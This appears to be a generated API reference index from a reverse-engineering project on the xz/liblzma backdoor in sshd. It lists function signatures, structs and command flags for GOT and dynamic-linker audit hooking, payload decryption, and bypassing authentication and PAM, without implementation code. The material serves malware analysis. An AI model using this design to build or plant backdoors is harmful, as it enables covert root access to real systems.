Definition: xzre.h:1829
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1819
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:2159
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:2165
u8 flags2
see InstructionFlags2
Definition: xzre.h:751
u8 flags
see InstructionFlags
Definition: xzre.h:747
void * symbol_ptr
points to a symbol in memory will be used to find the GOT value
Definition: xzre.h:689
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:694
array of ELF handles
Definition: xzre.h:1650
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1661
elf_info_t * main
this is for sshd
Definition: xzre.h:1655
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:915
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:844
u64 gnurelro_memsize
size of the GNU relro segment
Definition: xzre.h:890
Elf64_Verdef * verdef
pointer to the EFL symbol versioning (from DT_VERDEF)
Definition: xzre.h:894
u32 gnu_hash_last_bloom
last valid bloom value
Definition: xzre.h:932
Elf64_Dyn * dyn
pointer to the ELF dynamic segment
Definition: xzre.h:856
char * strtab
pointer to the ELF string table
Definition: xzre.h:864
Elf64_Phdr * phdrs
pointer to the ELF program headers array in memory
Definition: xzre.h:848
u32 gnu_hash_nbuckets
number of GNU hash buckets (from DT_GNU_HASH)
Definition: xzre.h:928
Elf64_Ehdr * elfbase
pointed to the ELF base address in memory
Definition: xzre.h:840
u64 e_phnum
copy of the ELF program header count from the ELF header
Definition: xzre.h:852
Elf64_Rela * plt_relocs
pointer to the ELF PLT relocations table
Definition: xzre.h:872
BOOL gnurelro_found
whether the loaded ELF contains PT_GNU_RELRO or not which specifies the location and size of a segmen...
Definition: xzre.h:882
u64 code_segment_start
page-aligned virtual address of the first executable ELF segment
Definition: xzre.h:910
u64 verdef_num
number of entries in the symbol versioning table
Definition: xzre.h:898
u64 gnurelro_vaddr
location of the GNU relro segment
Definition: xzre.h:886
Elf64_Sym * symtab
pointer to the ELF symbol table
Definition: xzre.h:868
u64 dyn_num_entries
number of entries in the ELF dynamic segment
Definition: xzre.h:860
u32 plt_relocs_num
number of entries in the PLT relocation table
Definition: xzre.h:876
void * lzma_code_end
liblzma code segment end
Definition: xzre.h:1364
libc_imports_t * libc_imports
pointer to the structure containing resolved libc functions
Definition: xzre.h:1307
char * STR_ssh_rsa_cert_v01_openssh_com
location of sshd .rodata string "ssh-rsa-cert-v01@openssh.com"
Definition: xzre.h:1325
BOOL disable_backdoor
This flag gets set to TRUE by run_backdoor_commands if any of the validity checks fail,...
Definition: xzre.h:1317
imported_funcs_t * imported_funcs
pointer to the structure containing resolved OpenSSL functions
Definition: xzre.h:1303
void * sshd_data_start
sshd data segment end
Definition: xzre.h:1345
u32 num_shifted_bits
number of bits copied
Definition: xzre.h:1393
void * sshd_code_start
sshd code segment start
Definition: xzre.h:1337
void * sshd_data_end
sshd data segment start
Definition: xzre.h:1349
char * STR_rsa_sha2_256
location of sshd .rodata string "rsa-sha2-256"
Definition: xzre.h:1329
void * sshd_code_end
sshd code segment end
Definition: xzre.h:1341
u64 current_data_size
number of body bytes copied to payload_data. will point to the digest at the end
Definition: xzre.h:1374
void * lzma_code_start
liblzma code segment start
Definition: xzre.h:1357
void * return_address
the return address value of the caller obtained from *(u64 *)(caller_locals+24) since the entrypoint ...
Definition: xzre.h:666
void * cpuid_fn
points to the real cpuid function
Definition: xzre.h:670
void * got_ptr
points to the Global Offset Table
Definition: xzre.h:659
ptrdiff_t got_offset
holds the offset of the symbol relative to the GOT. used to derive the got_ptr
Definition: xzre.h:675
BOOL result
TRUE if the instruction sequence was found, FALSE otherwise.
Definition: xzre.h:2239
u8 * offset_to_match
offset to match in the instruction displacement
Definition: xzre.h:2228
u8 * start_addr
start of the code address range to search
Definition: xzre.h:2218
u8 * end_addr
start of the code address range to search
Definition: xzre.h:2223
u32 * output_register_to_match
register to match as the instruction output
Definition: xzre.h:2233
the payload header. also used as Chacha IV
Definition: xzre.h:1879
u8 link_map_l_audit_any_plt_bitmask
bitmask that sets the link_map::l_audit_any_plt flag
Definition: xzre.h:1494
unsigned int * _dl_naudit_ptr
location of ld.so's _rtld_global_ro::_dl_naudit_ptr field
Definition: xzre.h:1513
u32 * sshd_auditstate_bindflags_ptr
the location of sshd's auditstate::bindflags field
Definition: xzre.h:1472
char ** libcrypto_l_name
location of libcrypto's link_map::l_name field
Definition: xzre.h:1530
size_t _dl_audit_symbind_alt__size
code size of ld.so's _dl_audit_symbind_alt() function
Definition: xzre.h:1542
u32 libcrypto_auditstate_bindflags_old_value
backup of the old value of libcrypto's libname_list::next field
Definition: xzre.h:1460
struct audit_ifaces ** _dl_audit_ptr
location of ld.so's _rtld_global_ro::_dl_audit_ptr field
Definition: xzre.h:1504
void * sshd_link_map_l_audit_any_plt_addr
location of sshd's link_map::l_audit_any_plt flag
Definition: xzre.h:1487
u32 * libcrypto_auditstate_bindflags_ptr
the location of libcrypto's auditstate::bindflags field
Definition: xzre.h:1455
u32 sshd_auditstate_bindflags_old_value
backup of the old value of sshd's libname_list::next field
Definition: xzre.h:1477
Structure to hold internal state of the check being calculated.
Definition: xzre.h:280
State for the internal SHA-256 implementation.
Definition: xzre.h:268
uint64_t size
Size of the message excluding padding.
Definition: xzre.h:273
data used within sshd_proxy_elevate
Definition: xzre.h:2042
struct monitor from openssh-portable
Definition: xzre.h:599
stack frame layout for run_backdoor_commands
Definition: xzre.h:2079
struct sensitive_data from openssh-portable
Definition: xzre.h:611
struct sshkey from openssh-portable
Definition: xzre.h:622
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1707
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1702
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1715
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1711
union used within run_backdoor_commands
Definition: xzre.h:2066
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1848
u32 index
Definition: xzre.h:1850
u32 byte_index
Definition: xzre.h:1855
u32 bit_index
Definition: xzre.h:1853
BOOL elf_find_function_pointer(StringXrefId xref_id, void **pOutCodeStart, void **pOutCodeEnd, void **pOutFptrAddr, elf_info_t *elf_info, string_references_t *xrefs, global_context_t *ctx)
this function searches for a function pointer, pointing to a function designated by the given xref_id
fake_lzma_allocator_t * get_lzma_allocator_address(void)
gets the address of the fake LZMA allocator
BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info)
Parses the given in-memory ELF file into elf_info.
BOOL process_is_sshd(elf_info_t *elf, u8 *stack_end)
checks if the current process is sshd by inspecting argv and envp.
BOOL sshd_get_usable_socket(int *pSock, int socket_index, libc_imports_t *imports)
gets the first usable socket fd
void mm_log_handler_hook(LogLevel level, int forced, const char *msg, void *ctx)
void * elf_symbol_get_addr(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Looks up an ELF symbol from a parsed ELF, and returns its memory address.
ssize_t c_strnlen(char *str, size_t max_len)
returns length of c string with a maximum length
void init_elf_entry_ctx(elf_entry_ctx_t *ctx)
initialises the elf_entry_ctx_t
BOOL verify_signature(struct sshkey *sshkey, u8 *signed_data, u64 sshkey_digest_offset, u64 signed_data_size, u8 *signature, u8 *ed448_raw_key, global_context_t *global_ctx)
Checks if signed_data is signed with ed448_raw_key.
BOOL validate_log_handler_pointers(void *addr1, void *addr2, void *search_base, u8 *code_end, string_references_t *refs, global_context_t *global)
Validate that the two addresses are the expected/correct ones.
void * dummy_tls_get_addr(tls_index *ti)
a dummy function that calls __tls_get_addr, to make sure its GOT slot doesn't get removed by compiler...
BOOL resolve_libc_imports(struct link_map *libc, elf_info_t *libc_info, libc_imports_t *imports)
parses the libc ELF from the supplied link map, and resolves its imports
struct key_payload_hdr backdoor_payload_hdr_t
the payload header. also used as Chacha IV
struct backdoor_payload backdoor_payload_t
the contents of the RSA 'n' field
void update_got_offset(elf_entry_ctx_t *ctx)
updates the offset to the GOT
struct gnu_hash_table gnu_hash_table_t
BOOL find_link_map_l_name(backdoor_data_handle_t *data_handle, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offsets required to modify ld.so's private struct auditstate state.
BOOL find_dl_naudit(elf_info_t *dynamic_linker_elf, elf_info_t *libcrypto_elf, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find __rtld_global_ro offsets required to modify ld.so's private struct audit_ifaces state.
void * elf_get_code_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the first executable segment in the given ELF file.
ssize_t fd_write(int fd, void *buffer, size_t count, libc_imports_t *funcs)
reads data to the specified file descriptor
BOOL find_instruction_with_mem_operand_ex(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, int opcode, void *mem_address)
finds an instruction with an immediate memory operand
BOOL process_shared_libraries(backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries
BOOL dsa_key_hash(const DSA *dsa, u8 *mdBuf, u64 mdBufSize, global_context_t *ctx)
obtains a SHA256 hash of the supplied RSA key
BOOL process_shared_libraries_map(struct link_map *r_map, backdoor_shared_libraries_data_t *data)
scans loaded libraries to identify interesting libraries and populate related data
BOOL backdoor_setup(backdoor_setup_params_t *params)
the backdoor main method that installs the backdoor_symbind64() callback
void * elf_get_reloc_symbol(elf_info_t *elf_info, Elf64_Rela *relocs, u32 num_relocs, u64 reloc_type, EncodedStringId encoded_string_id)
Searches the ELF relocations for a symbol having name encoded_string id and relocation of type reloc_...
BOOL elf_contains_vaddr_relro(elf_info_t *elf_info, u64 vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in the gnurelro segment
BOOL elf_contains_vaddr(elf_info_t *elf_info, void *vaddr, u64 size, u32 p_flags)
checks if given ELF file contains the range [vaddr, vaddr+size) in a segment with the specified memor...
BOOL find_link_map_l_audit_any_plt(backdoor_data_handle_t *data, ptrdiff_t libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find struct link_map offset required to modify ld.so's private link_map::l_audit_any_plt state.
void * lzma_alloc(size_t size, lzma_allocator *allocator)
lzma_alloc function, used by the backdoor as an ELF symbol resolver the allocator 's opaque field mus...
BOOL secret_data_append_item(secret_data_shift_cursor_t shift_cursor, unsigned operation_index, unsigned shift_count, int index, u8 *code)
Calls secret_data_append_singleton, if flags are non-zero.
const u64 tls_get_addr_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void init_ldso_ctx(ldso_ctx_t *ldso_ctx)
initializes/resets ldso data
BOOL init_imported_funcs(imported_funcs_t *imported_funcs)
Initializes the imported_funcs structure.
backdoor_hooks_data_t * hooks_data_addr
location of backdoor_hooks_data_t
BOOL sha256(const void *data, size_t count, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
computes the SHA256 hash of the supplied data
BOOL find_mov_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
finds a MOV instruction.
ElfId
Definition: xzre.h:400
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:405
int init_hooks_ctx(backdoor_hooks_ctx_t *ctx)
Initializes the structure with hooks-related data.
CommandFlags2
Definition: xzre.h:1969
@ X_FLAGS2_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1979
@ X_FLAGS2_PSELECT
executes pselect, then exit not compatible with command 2
Definition: xzre.h:1993
@ X_FLAGS2_CONTINUATION
more data available in the following packet not compatible with command 3
Definition: xzre.h:1988
@ X_FLAGS2_SOCKFD_MASK
(0111_1000 >> 3) & 0xF when CMDF_SOCKET_INDEX is specified
Definition: xzre.h:2000
@ X_FLAGS2_IMPERSONATE
if set, impersonate a user (info from payload) if not set, impersonate root
Definition: xzre.h:1974
BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx)
finds a call instruction
const elf_functions_t elf_functions
special .data.rel.ro section that contains addresses to various functions
ssize_t fd_read(int fd, void *buffer, size_t count, libc_imports_t *funcs)
reads data from the specified file descriptor
BOOL sshd_get_sshbuf(struct sshbuf *sshbuf, global_context_t *ctx)
Finds the right sshbuf (FIXME: which?), starting from: (*(ctx->struct_monitor_ptr_address))->kex->my
const ptrdiff_t elf_functions_offset
special .data.rel.ro section that contains the offset to elf_functions
void * backdoor_init(elf_entry_ctx_t *state, u64 *caller_frame)
calls backdoor_init_stage2 by disguising it as a call to cpuid.
BOOL secret_data_append_singleton(u8 *call_site, u8 *code, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
Shifts data in the secret data store, after validation of code. this function is intended to be invok...
BOOL contains_null_pointers(void **pointers, unsigned int num_pointers)
checks if the given array of pointers contains any NULL pointer
void * elf_get_data_segment(elf_info_t *elf_info, u64 *pSize, BOOL get_alignment)
Obtains the address and size of the last read-write segment in the given ELF file this is typically t...
BOOL extract_payload_message(struct sshbuf *sshbuf_data, size_t sshbuf_size, size_t *out_payload_size, global_context_t *ctx)
locates the RSA modulus from the given sshbuf. if found, the given sshbuf_data will be updated to poi...
const u32 string_action_data[1304]
contains action data for the encoded string radix tree
BOOL is_endbr64_instruction(u8 *code_start, u8 *code_end, u32 low_mask_part)
Checks if the code between code_start and code_end is an endbr64 instruction.
void fake_lzma_free(void *opaque, void *ptr)
a fake free function called by lzma_free()
void * elf_get_rodata_segment(elf_info_t *elf_info, u64 *pSize)
Obtains the address and size of the last readonly segment in the given ELF file this corresponds to t...
BOOL is_range_mapped(u8 *addr, u64 length, global_context_t *ctx)
verify if a memory range is mapped
int sshd_get_sensitive_data_score_in_do_child(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if do_child accesses sensitive_data or not
BOOL sshd_find_sensitive_data(elf_info_t *sshd, elf_info_t *libcrypto, string_references_t *refs, imported_funcs_t *funcs, global_context_t *ctx)
locates sensitive_data within sshd, and resolves some additional libcrypto functions
CommandFlags1
Definition: xzre.h:1946
@ X_FLAGS1_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1954
@ X_FLAGS1_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1966
@ X_FLAGS1_SOCKET_INDEX
custom monitor socket index override
Definition: xzre.h:1958
@ X_FLAGS1_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1950
@ X_FLAGS1_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1962
void update_cpuid_got_index(elf_entry_ctx_t *ctx)
get the cpuid() GOT index
BOOL sshd_proxy_elevate(monitor_data_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
uintptr_t backdoor_symbind64(Elf64_Sym *sym, unsigned int ndx, uptr *refcook, uptr *defcook, unsigned int flags, const char *symname)
the backdoored symbind64 installed in GLRO(dl_audit)
BOOL find_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA or MOV instruction with an immediate memory operand
EncodedStringId get_string_id(const char *string_begin, const char *string_end)
Get the.
BOOL rsa_key_hash(const RSA *rsa, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
obtains a SHA256 hash of the supplied RSA key
BOOL main_elf_parse(main_elf_t *main_elf)
Parses the main executable from the provided structure. As part of the process the arguments and envi...
fake_lzma_allocator_t fake_lzma_allocator
special .data.rel.ro section that contains a fake lzma_allocator
struct elf_handles elf_handles_t
array of ELF handles
BOOL find_add_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds an ADD instruction with an immediate memory operand
u8 * elf_find_string_reference(elf_info_t *elf_info, EncodedStringId encoded_string_id, u8 *code_start, u8 *code_end)
finds an instruction that references the given string
BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
disassembles the given x64 code
BOOL sshd_find_main(u8 **code_start_out, elf_info_t *sshd, elf_info_t *libcrypto, imported_funcs_t *imported_funcs)
finds the sshd_main function
BOOL find_lea_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA instruction with an immediate memory operand
const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts
special .rodata section that contains _cpuid() related GOT offsets
BOOL decrypt_payload_message(key_payload_t *payload, size_t payload_size, global_context_t *ctx)
decrypts the given backdoor payload
BOOL sshd_get_sensitive_data_address_via_krb5ccname(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, void **sensitive_data_out, elf_info_t *elf)
finds the address of sensitive_data.host_keys in sshd by using getenv( STR_KRB5CCNAME )
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1685
u8 * find_string_reference(u8 *code_start, u8 *code_end, const char *str)
finds an instruction that references the given string
int sshd_get_sensitive_data_score(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if accesses sensitive_data or not
BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx)
obtains a decrypted copy of the secret data
BOOL find_function_prologue(u8 *code_start, u8 *code_end, u8 **output, FuncFindType find_mode)
locates the function prologue
BOOL find_link_map_l_audit_any_plt_bitmask(backdoor_data_handle_t *data, instruction_search_ctx_t *search_ctx)
Find the bitmask required to modify ld.so's private link_map::l_audit_any_plt state.
void * c_memmove(char *dest, char *src, size_t cnt)
copies memory
int sshd_get_sensitive_data_score_in_demote_sensitive_data(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if demote_sensitive_data accesses sensitive_data or not
BOOL check_backdoor_state(global_context_t *ctx)
checks if the backdoor state is the expected one (FIXME: which?)
BOOL count_pointers(void **ptrs, u64 *count_out, libc_imports_t *funcs)
count the number of non-NULL pointers in the malloc'd memory block ptrs
unsigned int backdoor_entry(unsigned int cpuid_request, u64 *caller_frame)
calls backdoor_init while in the crc64() IFUNC resolver function
BOOL find_dl_audit_offsets(backdoor_data_handle_t *data, ptrdiff_t *libname_offset, backdoor_hooks_data_t *hooks, imported_funcs_t *imported_funcs)
Find the various offsets in ld.so that need modification to trigger _dl_audit_symbind_alt() to call b...
BOOL backdoor_init_stage2(elf_entry_ctx_t *ctx, u64 *caller_frame, void **cpuid_got_addr, backdoor_cpuid_reloc_consts_t *reloc_consts)
BOOL sshd_find_monitor_field_addr_in_function(u8 *code_start, u8 *code_end, u8 *data_start, u8 *data_end, void **monitor_field_ptr_out, global_context_t *ctx)
find a pointer to a field in struct monitor by examining code referencing it
const u64 string_mask_data[238]
contains mask data for the encoded string radix tree
int mm_answer_keyallowed_hook(struct ssh *ssh, int sock, struct sshbuf *m)
runs the payload received from sshd_proxy_elevate, and then runs the original mm_answer_keyallowed fu...
BOOL chacha_decrypt(u8 *in, int inl, u8 *key, u8 *iv, u8 *out, imported_funcs_t *funcs)
decrypts a buffer with chacha20
BOOL sshbuf_extract(struct sshbuf *buf, global_context_t *ctx, void **p_sshbuf_d, size_t *p_sshbuf_size)
checks if the provided buf is sane, then decomposes it into p_sshbuf_d and p_sshbuf_size
BOOL sshd_patch_variables(BOOL skip_root_patch, BOOL disable_pam, BOOL replace_monitor_reqtype, int monitor_reqtype, global_context_t *global_ctx)
Patches the sshd configuration.
void _cpuid_gcc(unsigned int level, unsigned int *a, unsigned int *b, unsigned int *c, unsigned int *d)
actually calls cpuid instruction
unsigned int _get_cpuid_modified(unsigned int leaf, unsigned int *eax, unsigned int *ebx, unsigned int *ecx, unsigned int *edx, u64 *caller_frame)
the backdoor entrypoint function, called by the IFUNC resolver for liblzma crc32() and crc64()
BOOL bignum_serialize(u8 *buffer, u64 bufferSize, u64 *pOutSize, const BIGNUM *bn, imported_funcs_t *funcs)
Serializes the BIGNUM bn to the buffer buffer.
BOOL elf_find_string_references(elf_info_t *elf_info, string_references_t *refs)
parses the ELF rodata section, looking for strings and the instructions that reference them
struct backdoor_data_handle backdoor_data_handle_t
data passed to functions that access the backdoor data
int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used in conjunction with mm_answer_keyallowed_hook to bypass the key validity check
union backdoor_runtime_data backdoor_runtime_data_t
union used within run_backdoor_commands
Elf64_Sym * elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version)
Looks up an ELF symbol from a parsed ELF.
u32 count_bits(u64 x)
returns the number of 1 bits in x
struct run_backdoor_commands_data run_backdoor_commands_data_t
stack frame layout for run_backdoor_commands
BOOL secret_data_append_from_address(void *addr, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
calls secret_data_append_singleton with either the given code address or the return address,...
BOOL secret_data_append_items(secret_data_item_t *items, u64 items_count, BOOL(*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *))
appends multiple secret data items at once
int sshd_get_sensitive_data_score_in_main(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if main accesses sensitive_data or not
BOOL sshd_get_client_socket(global_context_t *ctx, int *pSocket, int socket_index, enum SocketMode socket_direction)
Get either the read or write end of the sshd connection.
const ptrdiff_t fake_lzma_allocator_offset
special .data.rel.ro section that contains the offset to fake_lzma_allocator_struct
const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts
special .rodata section that contains __tls_get_addr() related GOT offsets
BOOL is_gnu_relro(Elf64_Word p_type, u32 addend)
checks if the provided identifiers represent a PT_GNU_RELRO
void * find_addr_referenced_in_mov_instruction(StringXrefId id, string_references_t *refs, void *mem_range_start, void *mem_range_end)
find an address referenced in a function
u32 resolver_call_count
counts the number of times the IFUNC resolver is called
BOOL sshd_configure_log_hook(cmd_arguments_t *cmd_flags, global_context_t *ctx)
configure the log hook
CommandFlags3
Definition: xzre.h:2003
@ X_FLAGS3_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:2011
@ X_FLAGS3_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:2007
struct monitor_data monitor_data_t
data used within sshd_proxy_elevate
const u64 cpuid_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
void * elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the GOT symbol with name encoded_string_id from the parsed ELF file.
void * elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the PLT symbol with name encoded_string_id from the parsed ELF file.
int mm_answer_authpassword_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used to bypass password authentication by replying with a successful MONITOR_ANS_AUTHPASSWORD
BOOL secret_data_append_from_call_site(secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index, BOOL bypass)
Shifts data in the secret data store, after validation of the call site, i.e. the caller of this func...
BOOL sshd_find_monitor_struct(elf_info_t *elf, string_references_t *refs, global_context_t *ctx)
finds the pointer to struct monitor, and updates the global context in ctx with its location
void * update_got_address(elf_entry_ctx_t *entry_ctx)
finds the __tls_get_addr() GOT entry
BOOL secret_data_append_from_code(void *code_start, void *code_end, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, BOOL start_from_call)
Pushes secret data by validating the given code block.
char * elf_find_string(elf_info_t *elf_info, EncodedStringId *stringId_inOut, void *rodata_start_ptr)
Locates a string in the ELF .rodata section.
BOOL find_function(u8 *code_start, void **func_start, void **func_end, u8 *search_base, u8 *code_end, FuncFindType find_mode)
locates the function boundaries.
void sshd_log(sshd_log_ctx_t *log_ctx, LogLevel level, const char *fmt,...)
calls sshlogv from openssh, similarly to sshlog in openssh
BOOL run_backdoor_commands(RSA *key, global_context_t *ctx, BOOL *do_orig)
checks if the supplied RSA public key contains the backdoor commands, and executes them if present.
BOOL sshd_get_sensitive_data_address_via_xcalloc(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, string_references_t *string_refs, void **sensitive_data_out)
finds the address of sensitive_data.host_keys in sshd by using XREF_xcalloc_zero_size in xcalloc
ptrdiff_t get_tls_get_addr_random_symbol_got_offset(elf_entry_ctx_t *ctx)
get the tls_get_addr_random_symbol GOT offset
BOOL sshbuf_bignum_is_negative(struct sshbuf *buf)
checks if the given serialized BIGNUM is negative
int init_shared_globals(backdoor_shared_globals_t *shared_globals)
Initializes the backdoor_shared_globals structure.
elf_functions_t * get_elf_functions_address(void)
gets the address of the elf_functions
BOOL find_mov_lea_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
like find_mov_instruction, but also considers LEA instructions
BOOL find_lea_instruction(u8 *code_start, u8 *code_end, u64 displacement)
finds a lea instruction
void * fake_lzma_alloc(void *opaque, size_t nmemb, size_t size)
a fake alloc function called by lzma_alloc() that then calls elf_symbol_get_addr()
ssize_t c_strlen(char *str)
returns length of c string
BOOL find_reg2reg_instruction(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx)
finds a reg2reg instruction
int hook_RSA_public_decrypt(int flen, unsigned char *from, unsigned char *to, RSA *rsa, int padding)
hook for RSA_public_decrypt, which triggers
lzma_allocator * get_lzma_allocator(void)
gets the fake LZMA allocator, used for imports resolution the "opaque" field of the structure holds a...
